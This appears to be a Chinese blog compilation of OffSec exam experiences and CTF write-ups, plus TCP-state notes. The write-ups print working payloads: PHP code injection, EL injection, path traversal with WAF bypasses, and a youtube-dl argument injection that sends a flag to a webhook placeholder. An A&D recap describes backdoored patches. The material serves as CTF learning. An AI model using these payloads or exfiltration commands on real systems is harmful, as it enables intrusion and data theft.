DEVCORE OffSec Live Training

D 社贊助的課程方案是買實體課附贈 Exclusive 6 Months Learn Unlimited Access，在 2024/08 有一次 Web-200 實體課程，並且在六個月時限內可以接觸幾乎所有教材（除了幾個超高階課），可以無限次考試，同項目的考試沒過的話有一個月冷卻期，不同項目則沒有，所以我在最後一個月連續排了 OSWA、OSWE、OSCP+ 考試，賺爛了賺爛了

Web-200 實體課是連續五天，每天八小時，講師會很詳細的帶著學生走一遍 Web-200 教材和做 Lab，教材內容涵蓋基礎的工具教學、XSS、CSRF、SQL Injection、Directory Traversal、XXE、SSTI、Command Injection、SSRF、Insecure Direct Object Referencing。

這堂課的定位是零基礎入門等級，因為我的程度遠超課程內容，所以先聲明我沒全神認真聽課都在打 Lab。以我想像中的新手來講講觀察到的優點，教材內容真的是手把手帶學生走一遍，對於剛入門的小白很友善，而且講師會帶入一些實際滲透的思維，問問題引導學生進入滲透測試人員的視角來思考下一步該做什麼，還會補充一些教材上沒有的知識和技巧，不只是單純的照本宣科，是我覺得這堂 Web-200 實體課最有價值的地方。還有一個可以考慮的優點是對於新手來說，不用害怕提出蠢問題和撞牆，能減少入門摸索期帶來的挫折感。

課堂上都是 CTFer 和滲透大大，第一天上完老師很疑惑的問我們為什麼要來上課，因為大多數人都直接開始挑戰 Lab :D 平常打的 CTF 難度遠超 Web-200，教材的難易程度是可以自己啃完，同樣價位會建議去選 Pen-200 實體課。

OSWA

人權(?)

Offensive Security Web Assessor (OSWA) 是 Web-200 課程的證照，時間是 24hr 要打五台主機，每台有 Local.txt 和 Proof.txt 兩個 Flag，每個 Flag 10 points，及格需要 70 points，考完後要在 24hr 內交報告。他們審報告超快，隔天就收到通知惹。

我只有在去年八月 live training 做完 Lab，原本想口試完一周內複習一下，實習遇到好玩的事就沒空看，大概算半裸考。

我從 1/18 06:00 開考，扣除吃飯睡覺打約打了 16hr。大概打到 12hr 時拿到 70 points 剛好及格，後面通靈力枯竭沒什麼進展。

考試開始前十五分鐘可以進入監考網站和監考官確認護照身分，他會要求錄製螢幕和開鏡頭確認環境，我平常用筆電外接螢幕時都使用 Mirror 或是只使用外接螢幕，分享螢幕時只會有一個能分享，此外我右邊女友座位上還有一個外接螢幕，考官在檢查環境後要求我要分享三個螢幕或是搬走，最後我搬走女友螢幕，並且用 Extended mode 分享兩個螢幕，考官才讓我開始考試。

強烈建議一定要先做課程的 Lab 再來考試，先體會到 Web-200 風格才不會自我懷疑。主機上的洞利用都很簡單，難的是發現和爆破路徑，有些已經知道下一步要爆破路徑，還是怎麼掃都找不到 lol。一定要注意網站內容，不要直接下去測 API，很多提示都藏在內文裡需要一點悟性，尤其是提示你有沒有 Emulated User ，會直接影響解題方向是不是 XSS，有許多人表示遇到 XSS Emulated User 擺爛觸發不了，我很幸運的沒有遇過。

Local.txt 存在於 Admin Panel， Proof.txt 則是本地檔案。Local.txt 在寫報告的要求是要截圖 Admin Panel，所以即使戳到其他的洞弄出來還是得找出通往 Admin Panel 的方法；Proof.txt 就沒有限制了，無論是讀檔洞還是 RCE 都可以。有一題我戳出非預期解直接拿到兩個 Flag，還是得乖乖的找出通往 Admin Panel 的路 Orz...

報告的部分因為我剛寫完論文對 word 很熟（用別人弄好的 word 模板真的香），所以選用官方提供的模板，code 套用 HTML 樣式調個間距還算能看他預設字體有點醜可以考慮換一個，剩下問題不大，調排版花不到一小時。

OSWA 說難不難，漏洞利用都幾分鐘的事，但是要找到洞在哪裡真的需要運氣和通靈。考完後覺得技術沒什麼進步，通靈力多了不少，爽賺三萬(?)

題外話，我問監考官非預期解合不合理，他們只會貼 exam guide 內容給你，幾乎問什麼都貼 exam guide，是不是客服人員在監考 ...

OSWE

人權

Offensive Security Web Expert (OSWE) 是 Web-300 的課程，主要是考白箱 code review 挖掘漏洞。考試時間 48hr，另外24hr交報告。

考試環境有兩台弱點主機、兩台 Debug 主機和一台 Kali，可以在 Debug 主機上看 code 和測試。弱點主機會從五種語言(PHP, Node.js, C#, Java, Python) 抽兩種，Debug 主機會有相對應的 vscode 和 decompiler。弱點主機有 Local.txt 和 Proof.txt，分別對應到 Admin Panel 35 points 和 RCE 15 points，85 points 及格，所以至少要兩台 Admin Panel 和一台 RCE。和 OSWA 相異的點是報告需要有一鍵觸發 Exploit，雖然考試要求 RCE 是 「execute command or reverse shell」，最好是能反彈 reverse shell 比較保險。

我是在 OSWA 考完後才開始看 OSWE 教材，大概從 1/21 準備到 1/23，想說看教材好無聊直接做 Lab，Lab 意外簡單，洞很直接，SQL Injection 直接拚接，XSS 黑箱測一測大多是裸的，還有邏輯洞忘記驗密碼...善用 vscode 的 regex search 很快就能定位到弱點，用 Buttom-up 來找非常快，做 Lab 時大概一小時內能看完找出弱點，弱點利用本身很簡單，所以我看完後沒特別寫 Exploit。題目比平常 CTF 題還要長一些，不過遠比 Real World 應用短很多。

有個小技巧是找註解、Logger、用上 filter 的地方

考試開始於 1/24 06:00 ，這次確認身分環境快很多，時間分配如下
0hr: 開題目，看到是 PHP 和 Java 後安心睡覺
0hr-6hr: 睡覺
6hr-10hr: 耍廢+吃飯
10hr-12hr: 弄 code review 環境
12hr-14hr: 吃飯
14hr-20hr: 解出 PHP local 和找出Java local & proof
20hr-30hr: 睡覺
30hr-32hr: 吃飯耍廢
32hr-36hr: 寫 Exploit、解出 Java local & proof，發現我不會寫  code
37hr-39hr: 再看 PHP，怎麼想都不可能 RCE，放棄開始寫報告39hr-42hr: 寫完報告交出去

我覺得考試和 Lab 遠比教材內的 Real World 簡單，考試讓我意外的是 admin panel 串的 API 蠻多的，不如 Lab 簡單粗暴。OSWE 最困難的是 code review 環境，只能用 ssh x11 forwarding 或是 RDP，不知道為啥我的 windows 11 host 開 rdp 超靠北慢，延遲十幾秒，官方沒有提供 ssh x11 forwarding 的教學文，我自己估狗弄一直設不好，倒是意外開成了 vscode ssh-remote，我用了快一小時才注意到，趕緊問考官能不能用 ssh-remote ，沒意外又得到 exam guide 連結，我詳細看完 exam guide 的限制 「Remote mounting of application source code is not allowed (e.g. using sshfs, sftp etc.)」 還有 vscode 的架構圖

從這裡有提到 ssh-remote 不算是 sshfs，更不可能是 "mount"，這樣看來 remote-ssh 頂多算是良好 GUI 介面的 ssh shell (?)

考後再加碼問 ChatGPT

雖然 exam guide 還有另一條「Downloading any applications, files or source code from the exam environment to your local machine is strictly forbidden.」實際上沒意義，因為 LFI 之類的都能看到 source code，甚至儲存於 Burpuiste project，只要不是故意想載整個考試環境 source code 都不會踩線，vscode remote-ssh 只會顯示必要的部分，就如同 Lab 裡附的 Browser-based vscode 一樣，如果 OffSec 這些限制是基於商業上保護版權的考量，沒道理 Lab 能用 browser-based vscode 考試卻禁止 vscode remote-ssh。

總之考官要給考生自行判斷，我查證完就當可以囉 speed up+++++++++++++++++++++++++++++++++++++++

唯一的難關弄完後效率爆增，後面順順的考完了。

OSWE 考試相當健康，正常吃正常睡，還能耍廢。我大多時間都花在寫 Exploit 和報告，報告一樣用官方模板，需要截圖 code 解釋原因還有解釋 Exploit，我寫的很詳細，幸好他沒刁報告扣分。

考完後呃有學到什麼又沒學到什麼的感覺，CTF 世界太卷，有閒錢可以考這張來增加信心(?) 大概是 EOF Final easy~medium 題

對了教材本身沒寫，大量 code review 過程可以試著練習怎麼創造一堆神奇的 Regex 來快速打撈漏洞，有閒也能弄個 AST 分析更精確的找出 pattern。

還要考 OSCP+ ....救命

Supercalifragilisticexpialidocious

簽到題

<?php

if (!isset($_GET['code'])) {
    echo '<h1>PHP Syntax Checker</h1><form method="GET"><textarea name="code"></textarea><br /><button type="submit">Submit</button></form><br />';
    highlight_file(__FILE__);
    exit();
}

$code = strval($_GET['code']);

try {
    create_function('', $code);
    echo "valid";
} catch (ParseError $e) {
    echo "syntax error";
}

create_function $code 可控，它的原理是拼接成函式後 eval ，類似 eval("function (){$code;}")  ，所以注入 php code 就能 RCE

payload

GET /?code=%3b%7dsystem(%22%2freadflag%22)%3b%2f* HTTP/1.1
Host: web.ctf.d3vc0r3.tw:8888

response

HTTP/1.1 200 OK
Date: Sat, 24 Aug 2024 17:24:18 GMT
Server: Apache/2.4.54 (Debian)
X-Powered-By: PHP/7.4.33
Content-Length: 32
Content-Type: text/html; charset=UTF-8

DEVCORE{o1d_th1ng_1s_g00d}
valid

Expressionism

spring index 會把 FLAG 放在 session

    ...
    @RequestMapping(value="/", method=RequestMethod.GET)
    public String index(@RequestParam(value="id", required=false) String id, Model model, HttpSession session) {
        if (id == null) {
            id = String.valueOf(random.nextInt(11) + 1);
        }
        model.addAttribute("id", id);
        session.setAttribute("FLAG", System.getenv("FLAG"));
        return "index";
    }
    ...

只有個 jsp 頁面，可控 id

<div class="container">
    <img src="/static/The_Scream.jpg" alt="The Scream">
    <p><spring:message code="life.quotes.${id}" /></p>
</div>

一臉給你注入，查了一陣子（java 的 document 真的難找....），後來丟去餵 chatgpt 才知道是 Expression Language，找到這篇 https://blog.csdn.net/jimmyleeee/article/details/114665906 ，知道 spring 會 evalute 兩次，然後錯誤訊息會回顯，所以先解析出 FLAG 讓他噴錯就行

payload

GET /?id=%24%7bsessionScope.FLAG%7d HTTP/1.1
Host: web.ctf.d3vc0r3.tw:18080

response

...
<pre>javax.servlet.jsp.JspTagException: No message found under code &#39;life.quotes.DEVCORE{d1d_y0u_kn0w_th1s_b3f0r3}&#39; for locale &#39;en_US&#39;.
...

I didn't know this before.

VArchive

開始有點挑戰了

題目是個 C# 網站， videoId 可控，要透過參數注入 youtube-dl 來 RCE

string arguments = string.Format("\"https://www.youtube.com/watch?v={0}\" -o \"{1}\"", videoId, outputPath);
ProcessStartInfo startInfo = new ProcessStartInfo();
startInfo.WorkingDirectory = "/archives";
startInfo.FileName = "youtube-dl";
startInfo.Arguments = arguments;
Process process = new Process();
process.StartInfo = startInfo;
process.Start();
byte[] result = Encoding.UTF8.GetBytes(string.Format("Start to download {0}", url));
response.OutputStream.Write(result, 0, result.Length);

翻一下 youtube-dl 可以找到 --exec ，在成功下載檔案後能執行

以為是水題，沒想到滿滿人類的惡意

第一個惡意是使用的 youtube-dl 版本 2021.12.17 太舊，連題目預設要下載的影片 https://www.youtube.com/watch?v=iU0QOcM7UnU 都會被 403，查到 -i 可以 ignore error 但是 -o 設定 output path 是單一的，當要試著下載多個檔案會直接錯誤

VArchive$ ./publish/youtube-dl "http://a" "http://b" -o apath
ERROR: fixed output name but more than one file to download

   參數本身是後蓋前，所以要透過 -- 把後面參數變成非參數

VArchive$ ./publish/youtube-dl --  -o apath
ERROR: '-o' is not a valid URL. Set --default-search "ytsearch" (or run  youtube-dl "ytsearch:-o" ) to search YouTube

然後找其他可上傳並且下載的站點，翻他 source code 包含超多網站，（不）意外的是有一堆 x 站，而幾乎每個 downloader 都會附幾個測資，我抱著學術研究精神好奇測試影片會不會是 hello world 教學，沒想到都是真槍實彈的。最後找到 streamable 和 google drive。

第二個惡意是莫名其妙的 ulimit 1kb ??????:D??????? 這邊讓我搞超久，大概方向有捏一個超級小的 media、下載部分檔案

我先查了一下 youtube-dl 要怎麼下載部分檔案，查到的大多是 ffmpeg 切影片轉檔，但是網站上沒有 ffmpeg，就改朝捏 media，自己隨便錄了段兩秒的影片，轉檔成一秒並且 frame rate 1，各種壓爛品質，轉成 webm 或是 gif，原本成功壓到 1kb 以下，丟到 streamable 後會被他強制做一次轉檔變成約 1.5kb，雖然還能線上做些裁切，最後也只壓到 1.3kb。還有查到一個有趣的 repo https://github.com/mathiasbynens/small 有各種最小尺寸的檔案。接著測試 googledrive 時遇到 youtube-dl 的坑，當檔案 <4kb 時， google drive 會沒辦法處理得到他的 metadata，導致 youtube-dl 拿 metadata 時失敗就噴了。

在 debug 時有看到 youtube-dl 處理流程會先匹配 URL， pattern 存在的話交給相對應的 extractor 和 downloader，第一個請求先拿 metadata，從中抽取真實檔案位置後第二個請求才下載。於是我猜次有沒有可能透過 open redirect 通過 URL 匹配跳轉到可控的 metadata，讓他載任意的檔案位置，結果是不行，因為從 metadata 抽出真實檔案位置後還會進行一次匹配。

最後是靈機一動想到 --add-header 可以加 "Range: bytes=0-499" ，然後就解了...

payload

youtube.com/watch?v=" "https://drive.google.com/file/d/1lgyCacgjiA90Vd0oayJnGcM5T_t9l5un/view?usp=sharing" -i -v --add-header "Range: bytes=0-499" --print-traffic --exec "python -c \"from urllib import request;request.urlopen('http://yourwebhook/$(/readflag|base64 -w 0)')#{}\""  --"

response

~$ ncat -klv 0.0.0.0 4242 
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:4242
Ncat: Connection from 172.104.94.128.
Ncat: Connection from 172.104.94.128:50960.
GET /REVWQ09SRXtjbDN1LjZpIHFvNGQuM3Q4NiEhfQo= HTTP/1.1
Accept-Encoding: identity
Host: blog.cjis.ooo:4242
User-Agent: Python-urllib/3.12
Connection: close

^C
~$ base64 -d
REVWQ09SRXtjbDN1LjZpIHFvNGQuM3Q4NiEhfQo=
DEVCORE{cl3u.6i qo4d.3t86!!}

p.s. 搞不好鈔能力去買些網站 premium 上傳無損檔案就好了...

酷拉皮卡 Kurapika

還在船上

一個黑箱的檔案上傳網站，稍微戳一下會知道他的 WAF 不是寫在 php 那層，因為上傳成功的 header 都帶有 apache，經過 php WAF 處理的也應該帶有 apache。

formdata filename 不能帶有 .ph .ht 還有 hacktrick 上那些名單， Content-Type 不能帶有 charset  

測過 apache 2.4.54 http smuggling POC、chunked coding bypass、sleep chunked、各種花式 content-type 分段都繞不過，我爛死QQQQQQQ

ginoah 說是 null byte 注在 boundary

Wall..Maria

前端是 go ，會做 proxy 到後端 Tomcat，要能 path traversal 讀 /flag.txt

go 有加一堆 waf，大致上要求不能有 .%2e 還有有些必須是 ascii。source code 有些我加的 log。

package main

import (
	"log"
	"io"
	"net/http"
	"os"
	"regexp"
	"strings"
)

func doWAF(r *http.Request) bool {
	var parsed = false
	var isPOST = r.Method == http.MethodPost

	bodyData, _ := io.ReadAll(r.Body)
	log.Println("bodyData: "+string(bodyData))
	r.Body = io.NopCloser(strings.NewReader(string(bodyData)))

	if hasDotDot(string(bodyData)) {
		return false
	}

	if mr, err := r.MultipartReader(); err == nil {
		log.Println("###multipartReader")
		for {
			parsed = true
			part, err := mr.NextPart()
			if err == io.EOF {
				break
			}
			data, _ := io.ReadAll(part)
			part.Close()
			if !isASCII(part.FormName()) || !isASCII(string(data)) || hasDotDot(string(data)) {
				return false
			}
		}
	} else {
		log.Println("###parseform")
		if err := r.ParseForm(); err != nil {
			return false
		}
		for key, values := range r.Form {
			parsed = true
			if !isASCII(key) || hasDotDot(key) {
				return false
			}
			for _, value := range values {
				log.Println("value  "+key+":"+value)
				if !isASCII(value) || hasDotDot(value) {
					return false
				}
			}
		}
	}

	r.Body = io.NopCloser(strings.NewReader(string(bodyData)))
	return !isPOST || (isPOST && parsed)
}

func hasDotDot(s string) bool {
	dotDotPattern := regexp.MustCompile(`(?i)(\.|%2e){2}`)
	if dotDotPattern.MatchString(s) {
		return true 
	}
	return false
}

func isASCII(s string) bool {
	for i := 0; i < len(s); i++ {
		if s[i] >= 0x7F || s[i] < 0x20{
			return false
		}
	}
	return true
}

func proxyRequest(w http.ResponseWriter, r *http.Request) {
	if !doWAF(r) {
		http.Error(w, "WAF!", http.StatusForbidden)
		return
	}

	backendURL := os.Getenv("BACKEND_URL")
	proxyReq, err := http.NewRequest(r.Method, backendURL+r.RequestURI, r.Body)
	if err != nil {
		http.Error(w, "Internal Server Error", http.StatusInternalServerError)
		return
	}

	for key, values := range r.Header {
		for _, value := range values {
			log.Println(key+":"+value)
			proxyReq.Header.Set(key, value)
		}
	}

	resp, err := http.DefaultClient.Do(proxyReq)
	if err != nil {
		http.Error(w, "Bad Gateway", http.StatusBadGateway)
		return
	}
	defer resp.Body.Close()

	for key, values := range resp.Header {
		for _, value := range values {
			w.Header().Set(key, value)
		}
	}
	w.WriteHeader(resp.StatusCode)
	io.Copy(w, resp.Body)
}

func main() {
	http.HandleFunc("/", proxyRequest)
	log.Println("Proxy server running on port 80...")
	log.Fatal(http.ListenAndServe(":80", nil))
}

Tomcat

<%
    String file = request.getParameter("file");

    if (
      file == null || file.isEmpty()
      || !request.getParameter("give").equals("me")
      || !request.getParameter("the").equals("flag")
    ) {
      %><script>window.location.href = "/?give=me&the=flag&file=greet";</script><%
    } else {
        try (java.io.FileInputStream fis = new java.io.FileInputStream("./webapps/ROOT/" + file)) {
            byte[] buffer = new byte[4096];
            int n;
            while ((n = fis.read(buffer)) != -1) response.getOutputStream().write(buffer, 0, n);
        } catch (Exception e) {
            response.sendError(404, e.getMessage());
        }
    }
%>

測試一下會發現 r.Body 行為很怪，沒有 Content-Length 時會是整個 request 內容，有 Content-Length 時會是 body 內容。

GET 請求時仍然可以帶 Content-Length 和 Content-type ，並且會被解析成功

r.MultipartReader 會解析 multipart/form-data; ，翻了一下 net/http 還說會寫解析 multipart/mixed

r.ParseForm 會解析  query 和 body， r.Form 會取 query，所以必須走 r.MultipartReader 那條路

// ParseForm populates r.Form and r.PostForm.
//
// For all requests, ParseForm parses the raw query from the URL and updates
// r.Form.
//
// For POST, PUT, and PATCH requests, it also reads the request body, parses it
// as a form and puts the results into both r.PostForm and r.Form. Request body
// parameters take precedence over URL query string values in r.Form.
//
// If the request Body's size has not already been limited by MaxBytesReader,
// the size is capped at 10MB.
//
// For other HTTP methods, or when the Content-Type is not
// application/x-www-form-urlencoded, the request Body is not read, and
// r.PostForm is initialized to a non-nil, empty value.

payload

GET /?give=me&the=flag&file=../../../../../../../flag.txt HTTP/1.1
Host: a
Content-Length: 134
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqSZSHGtnOhWX6qtX

------WebKitFormBoundaryqSZSHGtnOhWX6qtX
Content-Disposition: form-data; name="a"

me
------WebKitFormBoundaryqSZSHGtnOhWX6qtX--

response

HTTP/1.1 200 OK
Content-Length: 31
Content-Type: text/html
Date: Sat, 24 Aug 2024 15:00:10 GMT
Set-Cookie: JSESSIONID=E0DEAEFBDFA454B88FBA2B2419264A6E; Path=/; HttpOnly

DEVCORE{4S_1f_7h3rE_i5_n0_WAF}

Wall..Rose

不知道為啥這題 0 分

和前一題比，只是 WAF 多了偵測 r.URL

	if hasDotDot(string(bodyData)) || hasDotDot(r.URL.String()){
		return false
	}

proxy 時 http.NewRequest(r.Method, backendURL+r.RequestURI, r.Body) 使用的是 r.RequestURI ，文檔上說有些差異，我測了一陣子沒看到有差，翻實作也沒看到什麼，後來猜想 r.Body 行為那麼怪，會不會 client request 能覆蓋一些資料，追了一陣子都蠻正常的

jsp getParameter 只會從 query 或是 application/x-www-form-urlencoded 取得，並不會從 multipart/form-data 取得，意味著 payload 必定會在 body 長這樣 file=../../../../../flag.txt ，唯一能繞過的方式是改變編碼，恰巧 Tomcat 支援奇怪的 charset，像是

ibm037 可以這樣生

import urllib
from urllib import parse
s = "give=me&the=flag&file=../../../../../../flag.txt"
r = ""
for kv in s.split("&"):
    k, v = kv.split("=", 2)
    print(k, v)
    r += parse.quote(k.encode("IBM037")) + "=" + parse.quote(v.encode("IBM037")) + "&"
r = r[:-1]
print(r)

各種奇怪繞 WAF
https://www.slideshare.net/slideshow/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour/104553423
推薦，很全面> https://turn1tup.github.io/2019/04/23/对过WAF的一些认知/
https://github.com/kh4sh3i/WAF-Bypass

剩下問題是 golang 那層 parse 後的 key, value 只能有 ascii ，經過 ibm037 編碼會有非 ascii 字元

fuzzing 一陣子發現如果有重複的 Content-Type ，golang 會看第一個，但是 Tomcat 會看第二個，並且r.MultipartReader 可以忍受 last part 後有髒資料，看實作好像是 parse 時遇到 --boundary-- 就回傳 EOF，所以能忽略後面的髒資料

其實是 go proxy 寫法只會傳遞最後一個重複的 header，不是 Tomcat 本身的解析問題

所以最後 payload 長這樣

POST /?give=me&the=flag HTTP/1.1
Host: a
Content-Length: 114
Content-Type: multipart/form-data; boundary=a;charset=a
Content-Type: application/x-www-form-urlencoded; charset=ibm037

--a
Content-Disposition: form-data; name="a"

me
--a--
&%86%89%93%85=KKaKKaKKaKKaKKaKKa%86%93%81%87K%A3%A7%A3

response

HTTP/1.1 200 OK
Content-Length: 45
Content-Type: text/html
Date: Sat, 24 Aug 2024 15:49:22 GMT
Set-Cookie: JSESSIONID=C0C1B3A8A9C9C76A26CB124E7A8CFDD3; Path=/; HttpOnly

DEVCORE{DM_m3_y0uR_s01ut1oN!_R3a1lY_cUr10us}

這是三小，我好像有點牆

題外話，因為前陣子  im.b 很紅，我戳了一個小時多的 imb037...

Spring

ginoah 的言簡意賅題

題目是 spring boot 有個 SQL 注入，不過在這好像是 JPQL ，要能 RCE

@SpringBootApplication
@Controller
public class Application extends SpringBootServletInitializer{

    @PersistenceContext
    private EntityManager entityManager;

    public static void main(String[] args) {
        SpringApplication.run(Application.class, args);
    }

    @GetMapping("/{route}")
    public String index(@PathVariable String route, Model model) {
        return entityManager.createQuery(
                String.format("FROM Pages WHERE route = '%s'", route), Pages.class)
                .getResultStream()
                .findFirst()
                .orElseThrow(() -> new ResponseStatusException(HttpStatus.NOT_FOUND, "Page not found"))
                .name;
    }
}

題目就這樣（茶

.name 回傳的字串會變成搜尋 templates 下的檔案，猜測是和這裏的處理機制有關

Java 文檔真的好難找 Orz

然後想睡了QQ

窩不知道

Spring 回傳字串會經過 thymeleaf 解析，能做到 LFI/RFI 之類的 SSTI，HQL/JPQL（到底是哪個QAQ）禁止使用 union，但是可以透過  java constant 繞過，所以流程是 ‌‌java
1.  java constant 繞 union，控 return
2.  繞 thymeleaf  保護
3. SSTI

Notes Space

沒空看，Difficulty: ★★★★★★★

靠北怎麼從五顆變七顆 ★

後來寫到 /var/lib/mysql 後才成功 LFI，在拿到 root 後回去看，發現我確實有成功寫檔到 /tmp ，並且我用跑 apache2 的 user 直接用 php 執行檔案也成功，但是透過 apache2 跑卻會找不到，怪哉，怪哉

在查了好一陣子終於看到這篇 php-fpm temporary file path problem (Sytemd PrivateTmp pit) ，原來是 systemd 可以設置 PrivateTmp 讓每個 process 有獨立的 /tmp ，讀 source 可知實際位置會是 /tmp/systemd-private-{SD_ID128_TO_STRING(boot_id)}-{id}-XXXXXX  像是 /tmp/systemd-private-f5c7e8a0d62449b8b0efb31878c2771e-apache2.service-rhS5Q4 其中 boot_id 是任何人都可讀的 $ cat /proc/sys/kernel/random/boot_id ，開機會隨機產生， id 可預測，最後面的隨機字串 XXXXXX 則是透過呼叫 mkdtemp 產生。

透過這個方法產生的 /tmp  對於其他 process 看到的權限是 drwx------  3 root   root ，基本上是跑 systemd 的 user，所以在 zipping 這題是繞不過去。查了一下看到這篇 Access files in system tmp directory, when using PrivateTmp ，設計上也是不給共用，能繞就是 0-day 了。

但如果是其他場景下呢？不安全的 container 可能直接用 root 跑，並且對於 read-only filesystem 來說， /tmp 通常也能寫入，雖然 XXXXXX 太大，看 source 不確定能不能預測，但是使用 privateTmp 的 process 可以直接讀 /proc/self/mountinfo 獲得位置

...
/tmp/systemd-private-f5c7e8a0d62449b8b0efb31878c2771e-apache2.service-rhS5Q4/tmp /tmp rw,relatime shared:273 master:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
490 405 253:0 /var/tmp/systemd-private-f5c7e8a0d62449b8b0efb31878c2771e-apache2.service-rQZ1EI/tmp /var/tmp rw,relatime shared:274 master:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
...

不過 zipping 這題之所以會寫到 /tmp 而不是 privatetmp 是因為透過 mariadb 寫檔，因此只有當兩個 process 都是用 root 跑時，一個能寫檔一個能 LFI 才需要這樣搞。

p.s.  docker container boot_id 和 host 一樣，也許能利用？

再次鞭屍 @asef18766

依稀記得隊名是來自各個 Lab 的簡稱，經過錯序再加上 ab ，然後就沒一個人會念這坨，好像是某個生物激素的樣子

決賽主題是 Capture The Fans，場地很酷，有躺椅和懶骨頭，可惜離電源和網路線太遠不好用。主辦方竟然沒有人偶像服，差評。

More Smoked Leet Chicken 整隊戴雞頭， Kiwawa 戴小丑爆炸頭， respect!@as535364 說好穿女裝沒穿，wii 都願意提供了(

我這次幾乎都在弄 PSP 那題，題目是一個類似 PHP 的語言 PSP寫成的 note 服務，可以給偶像加油打氣留言，服務透過 Node.js 寫的解析器來跑 PSP，所以沒意外會有 PSP 解析洞可以直接控 Node.js 那層。

以我上次 EOF A&D 的經驗，我都在搞攻擊沒人弄 Patch 導致第一天失分慘重，沒人弄 Patch 就不會有人弄，剛好這次賽制是每輪釋出攻擊流量，攻擊基本上就抄別人的就好；Patch 則是第二天開始才會每輪釋出，現在強隊大概都知道 Patch 最終都是混淆埋後門，讓別人抄也至少送一分。所以這次我著重在搞 Patch，畢竟這題要用 PSP 那麼棒的語言，應該很少有隊伍會想搞。

策略上大概是對的，執行上遇到不少問題。

首先是主辦方一開始沒對 A&D 加以限制，開題不久後所有題目機就被 DoS 搞掛了，再加上不知道為什麼題目使用的 xinitd 在 docker 裡有 bug 服務起不來，而且在我們的 attack manager 上從頭搞環境時遇到 DNS 不知為何超慢的問題，後來 @as535364  和 @asef18766 弄了幾小時終於把服務架起來，在前兩三個小時只能靜態看那坨 PSP。

我還在看 PSP 時交代給 Charlie 抄攻擊，當時封包記錄下來流行的攻擊是很簡單的 Path Traversal，只是我們沒有任何服務能驗證他是可行的攻擊，所以直到題目機穩定前都沒有人開發 exploit。

在第一天結束前幾小時才寫出 path traversal exploit， 直接被 Kiwawa 虐了幾百分，賽後他們說第一天只是抄攻擊流量，第二天就沒看這題...

第一天上 Patch 的黃金時間已過，這題 Patch 本身難上好繞，因此需要想個策略去上，翻了一下發現規則有漏洞

Do not attempt to bypass service check or patch penalty in any ways. Consult organizers when in doubt.

如果我的目標是讓 patch invisible for player ，我可以同時滿足沒有 bypass service check and patch penalty，那好像只要每次更新 patch 時主動去觸發 Patch penalty 就不違反這規則 XD

實作上就是用 RCE 洞去下載一次自己的 Patch 後載入，因為他是 PSP

最後主辦方是把 Patch 會被公開也加入到 Patch Penalty 裡來解這個規則 bug XD

其實會盧是因為還沒找到方法完整控 Node.js，能控 Node.js 就是老套路混淆+後門，給你抄但是我至少可以打你。要用 PSP 寫個基本條件過濾字串的 WAF 就花我幾個小時 debug， Token 間的空白會影響解析結果，行為還不一致，debug 結果就是有些可以空白有些不行...

那時大概是知道有 class 和 fmt 兩個可以控 Node.js，我這邊還沒有空研究詳細 exploit，就丟給 Sun 大大開發，開發成功後開始穩定拿分
<(_ _)>

後續 Patch 系統本身也出現很多 bug，像是好幾輪前已經 Patch 成功的東西丟上去會失敗，丟別隊 Patch 會失敗，因為某輪開始主辦方改了 service check，導致 Patch 成功判定變成很隨機的樣子。直到第二天下午才終於成功上了基本的 Patch。

結果這題被 Kiwawa 虐超過五百分的樣子QQ

這大概就是為啥 PM 不要跳下去寫 code，都在忙 patch 太晚找人寫 exploit

賽後找喵喵討論，才發現還有很多梗是所有隊伍都沒發現的，像是PSP 沒有註解存在、所有字串都可以做 Function call 很 PHP

原本對 PSP 生氣氣花兩天打了個空氣就忽然覺得他好棒有梗，只是 infra 太炸埋沒了它

最後幾輪看到 Kiwawa 快追上，差點一群老人就被虐了，好強...

拿到 Taiwan Star $1,000 :D

這次 HITCON Carnival 整題視覺設計超棒，真的好想把 CTF 和活動錯開一點時間讓選手也能逛逛。不知道有沒有出周邊欸，好想買那隻喵喵玩偶、帽子和貼紙

今天在看 linkerd 遇到相關的 feature ，查一下找到 RFC9293

TCP Peer A                                           TCP Peer B

1.  ESTABLISHED                                          ESTABLISHED

2.  (Close)
    FIN-WAIT-1  --> <SEQ=100><ACK=300><CTL=FIN,ACK>  --> CLOSE-WAIT

3.  FIN-WAIT-2  <-- <SEQ=300><ACK=101><CTL=ACK>      <-- CLOSE-WAIT

4.                                                       (Close)
    TIME-WAIT   <-- <SEQ=300><ACK=101><CTL=FIN,ACK>  <-- LAST-ACK

5.  TIME-WAIT   --> <SEQ=101><ACK=301><CTL=ACK>      --> CLOSED

6.  (2 MSL)
    CLOSED

TCP Peer A                                           TCP Peer B

1.  ESTABLISHED                                          ESTABLISHED

2.  (Close)                                              (Close)
    FIN-WAIT-1  --> <SEQ=100><ACK=300><CTL=FIN,ACK>  ... FIN-WAIT-1
                <-- <SEQ=300><ACK=100><CTL=FIN,ACK>  <--
                ... <SEQ=100><ACK=300><CTL=FIN,ACK>  -->

3.  CLOSING     --> <SEQ=101><ACK=301><CTL=ACK>      ... CLOSING
                <-- <SEQ=301><ACK=101><CTL=ACK>      <--
                ... <SEQ=101><ACK=301><CTL=ACK>      -->

4.  TIME-WAIT                                            TIME-WAIT
    (2 MSL)                                              (2 MSL)
    CLOSED                                               CLOSED

還有偵測 half-closed script，去 /proc/net/tcp 抓 connection state

46: 010310AC:9C4C 030310AC:1770 01
|      |      |      |      |   |--> connection state
|      |      |      |      |------> remote TCP port number
|      |      |      |-------------> remote IPv4 address
|      |      |--------------------> local TCP port number
|      |---------------------------> local IPv4 address
|----------------------------------> number of entry

00000150:00000000 01:00000019 00000000
   |        |     |     |       |--> number of unrecovered RTO timeouts
   |        |     |     |----------> number of jiffies until timer expires
   |        |     |----------------> timer_active (see below)
   |        |----------------------> receive-queue
   |-------------------------------> transmit-queue

1000        0 54165785 4 cd1e6040 25 4 27 3 -1
 |          |    |     |    |     |  | |  | |--> slow start size threshold,
 |          |    |     |    |     |  | |  |      or -1 if the threshold
 |          |    |     |    |     |  | |  |      is >= 0xFFFF
 |          |    |     |    |     |  | |  |----> sending congestion window
 |          |    |     |    |     |  | |-------> (ack.quick<<1)|ack.pingpong
 |          |    |     |    |     |  |---------> Predicted tick of soft clock
 |          |    |     |    |     |              (delayed ACK control data)
